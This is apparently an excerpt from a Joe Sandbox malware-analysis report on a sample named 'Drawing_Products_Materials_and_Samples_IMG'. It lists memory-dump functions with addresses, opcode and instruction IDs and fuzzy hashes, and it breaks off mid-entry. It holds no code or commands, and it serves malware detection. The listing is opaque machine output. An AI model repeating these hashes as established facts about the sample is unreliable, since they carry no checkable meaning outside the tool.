                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 371640f0311540dd259cf6713cdee2c05fae75c0249c795c6db794adcb1a2e3f
                                                                                      • Instruction ID: 0a8579e572e8023be3f25dc7653a441f8d6961c6c5353b289aad2870cfe20e99
                                                                                      • Opcode Fuzzy Hash: 371640f0311540dd259cf6713cdee2c05fae75c0249c795c6db794adcb1a2e3f
                                                                                      • Instruction Fuzzy Hash: 5C219F357042104BEB2C272988946BE3A9BAFC5725F24C039D506CB3D9EF79CCC2A791
                                                                                      Function 0011B83B Relevance: .1, Instructions: 80COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22114996558.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_110000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: cf1f74ce17e6d5ccd2ce6673a7d8cddf4971a8ac4bda711ab62277174c5f64a2
                                                                                      • Instruction ID: 4b83df4d0a85a056ded1e0426aebad47e499a5c45304c7b44122afb849e49d89
                                                                                      • Opcode Fuzzy Hash: cf1f74ce17e6d5ccd2ce6673a7d8cddf4971a8ac4bda711ab62277174c5f64a2
                                                                                      • Instruction Fuzzy Hash: E9218036B045118FD7189B2DD484AAAB7EAAFC8B20B1A407AE405CB371CF71DC41D790
                                                                                      Function 00116680 Relevance: .1, Instructions: 78COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22114996558.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_110000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: bc2bc6fa016d2493aa74605d5fe7a5c3696bf1c7795077196ba47a4a6e18d0a1
                                                                                      • Instruction ID: 55c91dd4be14b082aec8cc29fee1f84913d690f7fc5f2498ba60e1cddde6710b
                                                                                      • Opcode Fuzzy Hash: bc2bc6fa016d2493aa74605d5fe7a5c3696bf1c7795077196ba47a4a6e18d0a1
                                                                                      • Instruction Fuzzy Hash: BF2123357005118BC72C9B69D45496EB792FF8AB657158139E906DB390CF35DC42CBC0
                                                                                      Function 0011B840 Relevance: .1, Instructions: 78COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22114996558.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_110000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f74c3967f59200d776445e86e0e19d1a0f149824e0809e82f0626d1aa9089045
                                                                                      • Instruction ID: 346af19220cf9e0e533e4e92e0af26c68af7d23355de280a7772d9cc9cdb91de
                                                                                      • Opcode Fuzzy Hash: f74c3967f59200d776445e86e0e19d1a0f149824e0809e82f0626d1aa9089045
                                                                                      • Instruction Fuzzy Hash: 09215036B045118FD7189B6DD494A6AB7EAAFC8B10B194079E405CB371DF71DC41C790
                                                                                      Function 00112C78 Relevance: .1, Instructions: 77COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22114996558.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_110000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e0a88bf2ad7956fdae260ad35f446c43746116395db14d4afdfb522f2507e47f
                                                                                      • Instruction ID: 8583f29048a7eb7dcfb3ff692b2f16d303542cbc44b14fdb8f07dd347b010333
                                                                                      • Opcode Fuzzy Hash: e0a88bf2ad7956fdae260ad35f446c43746116395db14d4afdfb522f2507e47f
                                                                                      • Instruction Fuzzy Hash: AE21A435A001189FDF28DB68D440AEE7BA5EB99360F10C029D81ADB250DB35EE47CBD1
                                                                                      Function 0009D664 Relevance: .1, Instructions: 75COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22114295275.000000000009D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0009D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_9d000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c5205851e1e4416265446a9a0ade25526e944f23a20e6241af97806dd31dbc48
                                                                                      • Instruction ID: 1cbc9f06894962fabae1671f7b78c0433d9af5d814ebb2fb0b2ed2d7d400260a
                                                                                      • Opcode Fuzzy Hash: c5205851e1e4416265446a9a0ade25526e944f23a20e6241af97806dd31dbc48
                                                                                      • Instruction Fuzzy Hash: 3E210375548340EFDF15DF50D9C0B1AFFA5EB84314F24816AE9090B246C336D856EBA1
                                                                                      Function 0009D578 Relevance: .1, Instructions: 75COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22114295275.000000000009D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0009D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_9d000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: dc097e1a3e68becb80a011f921ac83907daef05c6eab6b3f47c6410fdcfefe35
                                                                                      • Instruction ID: 75ad3788187de2339026d143b56a8038f3163d1d80ca3a79c57740d0e2accc09
                                                                                      • Opcode Fuzzy Hash: dc097e1a3e68becb80a011f921ac83907daef05c6eab6b3f47c6410fdcfefe35
                                                                                      • Instruction Fuzzy Hash: 28212276244340DFDF14DF10D9C0B2ABFA5FB98324F34866AE9090B246C336D856EBA1
                                                                                      Function 000AD044 Relevance: .1, Instructions: 72COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22114412661.00000000000AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000AD000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_ad000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ce598c5194055272c0282423165dfd091caaaf77c27720c27ee68baa0a90fbb9
                                                                                      • Instruction ID: 4e4a260c40376217825afccffdf1d4fe722185371f8c324215e2c40f29788136
                                                                                      • Opcode Fuzzy Hash: ce598c5194055272c0282423165dfd091caaaf77c27720c27ee68baa0a90fbb9
                                                                                      • Instruction Fuzzy Hash: 2221F575604304EFDB24DF60D9C4F16BBA1EB85314F34C66EE94A4B642C736D846CA61
                                                                                      Function 3736A2D9 Relevance: .1, Instructions: 69COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 7cb78b3ec0c56ace512cb86fa2fe53b4d02f2d2a68448e6b677ec72c4afe0ba0
                                                                                      • Instruction ID: 55ea9e18b5020a1e3963d6ce6f6edd44e656da1ae0c9a3dda6ab4e4bf1f1f46c
                                                                                      • Opcode Fuzzy Hash: 7cb78b3ec0c56ace512cb86fa2fe53b4d02f2d2a68448e6b677ec72c4afe0ba0
                                                                                      • Instruction Fuzzy Hash: 512112B5D012189FCB50CFA9D4847DEFBF0EB48320F20806AE808AB240D775AA45CBA4
                                                                                      Function 001159D7 Relevance: .1, Instructions: 68COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22114996558.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_110000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9f1a5277ee3d57dbb031e52666a65409bf30db438063bae21b8286df665468af
                                                                                      • Instruction ID: f5ab8755454960ddeb68ab03470b5430e562aa5afc0dbde5b7bf7e884f086e91
                                                                                      • Opcode Fuzzy Hash: 9f1a5277ee3d57dbb031e52666a65409bf30db438063bae21b8286df665468af
                                                                                      • Instruction Fuzzy Hash: AD210231744109EFDB089F64E485AEB3BA6FF8A314F004039F8068B255CB38DD96DB90
                                                                                      Function 0011A7C4 Relevance: .1, Instructions: 67COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22114996558.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_110000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 53e1ed098f78bf6da260d78c2f364080b52bfd967e84fbdbb233c9145999b11d
                                                                                      • Instruction ID: 792843e8e35894c5c470a09e6583cf2169f57a63b0e26ed1ea948ccab853908f
                                                                                      • Opcode Fuzzy Hash: 53e1ed098f78bf6da260d78c2f364080b52bfd967e84fbdbb233c9145999b11d
                                                                                      • Instruction Fuzzy Hash: 0D21B031605245CFCB19CF28C844B997FB1EF45315F4580AAE9599B2A2D731EC81CB52
                                                                                      Function 3736A2E0 Relevance: .1, Instructions: 67COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 950d78e5d43f48b47c657b148ce519324617a157f751ff972a8f920a6157116e
                                                                                      • Instruction ID: 380ecc340f6b01f6d0f5370c1bfcdbc5b084a23e0aee75185429583228b26ada
                                                                                      • Opcode Fuzzy Hash: 950d78e5d43f48b47c657b148ce519324617a157f751ff972a8f920a6157116e
                                                                                      • Instruction Fuzzy Hash: 7E2104B5D012189FCB50CF99D584BDEFBF4EB48320F24806AE808AB240D775AA44CBA4
                                                                                      Function 00119AF9 Relevance: .1, Instructions: 65COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22114996558.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_110000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3ad78e7cd27097601cb835cb1dd4a6808a8abee140ae762de6873b8c0c7680f8
                                                                                      • Instruction ID: 6e328d212d51759686012d8b664fb29c4668f2cba65eb46fb6ef33607bf248f4
                                                                                      • Opcode Fuzzy Hash: 3ad78e7cd27097601cb835cb1dd4a6808a8abee140ae762de6873b8c0c7680f8
                                                                                      • Instruction Fuzzy Hash: C1216B30E042499FDB09CFA1E550AEEBBB6FF49300F248029F421B6250DB349981DB64
                                                                                      Function 0011B280 Relevance: .1, Instructions: 62COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22114996558.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_110000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 85e70c7ccc51f9b32e91c3effa966570b4739c54da2180c5dbd892163ba17753
                                                                                      • Instruction ID: bf69cd625b0b0999b7e7131c0664be03fcfc83215803cc3ccf85439d7bcd5afc
                                                                                      • Opcode Fuzzy Hash: 85e70c7ccc51f9b32e91c3effa966570b4739c54da2180c5dbd892163ba17753
                                                                                      • Instruction Fuzzy Hash: F2114F36B14204ABDB18DF65C994ADEBBB6FF8D710F108029E916A7350DB71AD11CB90
                                                                                      Function 36A9953F Relevance: .1, Instructions: 62COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150235357.0000000036A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_36a90000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 277490b34669fee9bdd23b6a345b56493b80ea578c2b635523996e30a4614372
                                                                                      • Instruction ID: 5dcb29796548aedc7ec76e41569f14834071b31f4ecdf8525800bbfb922b62b7
                                                                                      • Opcode Fuzzy Hash: 277490b34669fee9bdd23b6a345b56493b80ea578c2b635523996e30a4614372
                                                                                      • Instruction Fuzzy Hash: 85113D74E0921C9FEB04DFA9C984AEDB7F5FB88318F788165E908A7245DB349841CF50
                                                                                      Function 00116688 Relevance: .1, Instructions: 59COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22114996558.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_110000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1a173fb76fe236fe8a84659ef151eb7d8c8c7cd0e8e87bf91fc01f342a806284
                                                                                      • Instruction ID: 3e876403b14648909bb60c742a6cbede79171a36d05edb1bb4a683c2968457b9
                                                                                      • Opcode Fuzzy Hash: 1a173fb76fe236fe8a84659ef151eb7d8c8c7cd0e8e87bf91fc01f342a806284
                                                                                      • Instruction Fuzzy Hash: 7811E5357015118BC71D9B2AC85492EB796FF8A7653150078E906DB3A0DF21DC42CB90
                                                                                      Function 36A94800 Relevance: .1, Instructions: 57COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150235357.0000000036A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_36a90000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e4306ffee4a846c8f01d703b3f546347e8c7a04758e86522a9e4595d8a728179
                                                                                      • Instruction ID: b463246ae6559ce1012d4d8710c5024e3b0a77b3c4a28e10867180d73fd95cfc
                                                                                      • Opcode Fuzzy Hash: e4306ffee4a846c8f01d703b3f546347e8c7a04758e86522a9e4595d8a728179
                                                                                      • Instruction Fuzzy Hash: 75115135E003198BDB18EFB989546EEBBF5EF84250B618139D918A7300DB359C41CBE1
                                                                                      Function 00112B77 Relevance: .1, Instructions: 55COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22114996558.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_110000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b4a0b9202ad71f5ac8470181da9e6dc056f0b051fa6b08b667386a2027c01960
                                                                                      • Instruction ID: a0d5325bb0fb6ef6a1d253496c61871596102b98d48f73f08846831161ea4b0c
                                                                                      • Opcode Fuzzy Hash: b4a0b9202ad71f5ac8470181da9e6dc056f0b051fa6b08b667386a2027c01960
                                                                                      • Instruction Fuzzy Hash: 6221CE74D0460A8FCB44EFA9D8445EEBBF0FF4A301F10566AD805B3220EB345A95CB91
                                                                                      Function 3741F2C8 Relevance: .1, Instructions: 55COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22151214905.0000000037410000.00000040.00000800.00020000.00000000.sdmp, Offset: 37410000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37410000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d44f74d1bdade34f18ce01edd0b8721b70f4e577c7fbac85fc10a56cfe786fd4
                                                                                      • Instruction ID: 4fb309f2a7f342fd212bd08c43a5f89a2d374c0fb84942456a3eb5dc061acdb1
                                                                                      • Opcode Fuzzy Hash: d44f74d1bdade34f18ce01edd0b8721b70f4e577c7fbac85fc10a56cfe786fd4
                                                                                      • Instruction Fuzzy Hash: AD112374A0434ACFEB04EB65D8047EE7BF1BB89320F0004A9C000B7282CF746946CBA9
                                                                                      Function 37369300 Relevance: .1, Instructions: 54COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: fb9b9fa3b3338ddc0d3de6225317ff1a3d623ff8b215e8e657e375738dda29dc
                                                                                      • Instruction ID: d64b05def2f96245ec8b68f8d6728f059fdb0525fac816118331c6a2d149bd4f
                                                                                      • Opcode Fuzzy Hash: fb9b9fa3b3338ddc0d3de6225317ff1a3d623ff8b215e8e657e375738dda29dc
                                                                                      • Instruction Fuzzy Hash: EB1144768002499FDB10CF99C544BEEFBF4EB48320F20841AE558A7250C339AA95DFA5
                                                                                      Function 3736884C Relevance: .1, Instructions: 54COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: bf37a1254967c4103ba3c284ec1b09d6f9671b03cfd3aeec8e6ea929071e505d
                                                                                      • Instruction ID: 27c5973193872051d61a48350bce70edd93c33c62ae8a1cfc9ab665d716c7d34
                                                                                      • Opcode Fuzzy Hash: bf37a1254967c4103ba3c284ec1b09d6f9671b03cfd3aeec8e6ea929071e505d
                                                                                      • Instruction Fuzzy Hash: 13112E74F002488FEB00DFACD944BDEBBB5EB88715F108055E80CA7349E63099418B51
                                                                                      Function 37369308 Relevance: .1, Instructions: 52COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 96f7f335b546bdcde81efac2185f53a50d34920833e4d2a6998418052f55ec1b
                                                                                      • Instruction ID: aeee065cdcddc4fdfbedd77f4e7bd9a8c3a18a01645f4c28ab986a6b859d0652
                                                                                      • Opcode Fuzzy Hash: 96f7f335b546bdcde81efac2185f53a50d34920833e4d2a6998418052f55ec1b
                                                                                      • Instruction Fuzzy Hash: CC1126768002499FDB10CF99C944BDEBBF5EB48320F148419E558A7250C339A551DFA5
                                                                                      Function 3741F21A Relevance: .0, Instructions: 48COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22151214905.0000000037410000.00000040.00000800.00020000.00000000.sdmp, Offset: 37410000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37410000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: eadc53c66a38775c11b8c8803914f42ec6410ca709f8dcca0fdb0922e1872b58
                                                                                      • Instruction ID: 5a3950550ab328c7a8f7312739738e0be79024b44510d6b39779df39d6812da1
                                                                                      • Opcode Fuzzy Hash: eadc53c66a38775c11b8c8803914f42ec6410ca709f8dcca0fdb0922e1872b58
                                                                                      • Instruction Fuzzy Hash: F3015A79E00614CFD760EF7CD958A9A7BF4AF8926171105A9E809E7321EB35EC428B90
                                                                                      Function 36A92FE8 Relevance: .0, Instructions: 47COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150235357.0000000036A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_36a90000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 736d270df8fabd631bdb311da9b4f55efa63c41b49feac0ddecded1349d15e13
                                                                                      • Instruction ID: 4cde523da65570937229f5c1f7726a5d6a337fd412502b1d97cc6cdacd82c551
                                                                                      • Opcode Fuzzy Hash: 736d270df8fabd631bdb311da9b4f55efa63c41b49feac0ddecded1349d15e13
                                                                                      • Instruction Fuzzy Hash: 9B015235E0025DAFDB14AF64D844AEEBFB5FF89310F104439FC1996251DB304951DB95
                                                                                      Function 36A92FF8 Relevance: .0, Instructions: 46COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150235357.0000000036A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_36a90000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a333447e0759e2a9bac38f8260da70b39b6229d6ebfd2fec175fc3f87944d1e9
                                                                                      • Instruction ID: 4135d49aa877ead06fe7fa36bb64fbc4663a9ac6ac57fa46bd17df65bdc06af4
                                                                                      • Opcode Fuzzy Hash: a333447e0759e2a9bac38f8260da70b39b6229d6ebfd2fec175fc3f87944d1e9
                                                                                      • Instruction Fuzzy Hash: 63015235E002199FDF14AF65D8546AE7BB9FF88350F004439FD1597241DB358D118BA5
                                                                                      Function 0009D01D Relevance: .0, Instructions: 45COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22114295275.000000000009D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0009D000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_9d000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 50f9336fae1b227ea5980fc78dfa3c0d5e0fbf53aa3c084b6fedbfd6c69708ac
                                                                                      • Instruction ID: 21c016a76882e408b05a7e64080eb600907905f28bd073e88f9f5399163e30f6
                                                                                      • Opcode Fuzzy Hash: 50f9336fae1b227ea5980fc78dfa3c0d5e0fbf53aa3c084b6fedbfd6c69708ac
                                                                                      • Instruction Fuzzy Hash: 3301F231444340AFEB644A25CDC4B6AFFD8DF81364F28811BED480B282D27AD845EAB5
                                                                                      Function 0011AF70 Relevance: .0, Instructions: 44COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22114996558.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_110000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c35d021c784ed72a93eca8d7c753810d6dd48cc1a38cc5c8da75c994337b8c8d
                                                                                      • Instruction ID: 235047c0d39292d6319f3d7f5b1ce80f1953ab4b626ef3e6e8e1d0c48d6ff771
                                                                                      • Opcode Fuzzy Hash: c35d021c784ed72a93eca8d7c753810d6dd48cc1a38cc5c8da75c994337b8c8d
                                                                                      • Instruction Fuzzy Hash: 8CF0C2713016124B871D6A2F8854AAEBB9EEFC5B517554079F805C7365DF20DC438791
                                                                                      Function 0011EB43 Relevance: .0, Instructions: 43COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22114996558.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_110000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6688724bf95d88be21f8b115e89a52494d31f86dc155a9d1c3c9a96db8a8b76e
                                                                                      • Instruction ID: 07e623521ff6f888fe0b41c2f2fe2558d89578910c0bca23da22e1c72db8268a
                                                                                      • Opcode Fuzzy Hash: 6688724bf95d88be21f8b115e89a52494d31f86dc155a9d1c3c9a96db8a8b76e
                                                                                      • Instruction Fuzzy Hash: EE012574E04209EFDB01CFA8D8449EEBBB6FB4D310F109029D915A3351DB319A42DF90
                                                                                      Function 36A94898 Relevance: .0, Instructions: 41COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150235357.0000000036A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_36a90000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 13e577353da4e7afdbb9ba89d91814c1519d325cf6e06c3aeef4ac344f59e24a
                                                                                      • Instruction ID: dd61508c2bb21cfc18502e7beaa7114e112a1f495df10439da8214030fbe9ee4
                                                                                      • Opcode Fuzzy Hash: 13e577353da4e7afdbb9ba89d91814c1519d325cf6e06c3aeef4ac344f59e24a
                                                                                      • Instruction Fuzzy Hash: A1F02B32B04614ABCB199B69E4545DFB7F9EFC5361B2040BAE808DB350CE31C802C7D2
                                                                                      Function 373690B8 Relevance: .0, Instructions: 41COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b327001d0a824120d0b9d4174b6b0ed4e2506b85d39cf49f8cbbf75dd821dca1
                                                                                      • Instruction ID: 5ca9911d667c5d8ee520c513cc0748d54802e8d3a1c845a20e0dcd7c43e83931
                                                                                      • Opcode Fuzzy Hash: b327001d0a824120d0b9d4174b6b0ed4e2506b85d39cf49f8cbbf75dd821dca1
                                                                                      • Instruction Fuzzy Hash: A4F0C8336052586FCF054FA898405EF7FE7EFCA354B05442BF909D7251CA314D11A7A6
                                                                                      Function 3741ECBF Relevance: .0, Instructions: 40COMMON
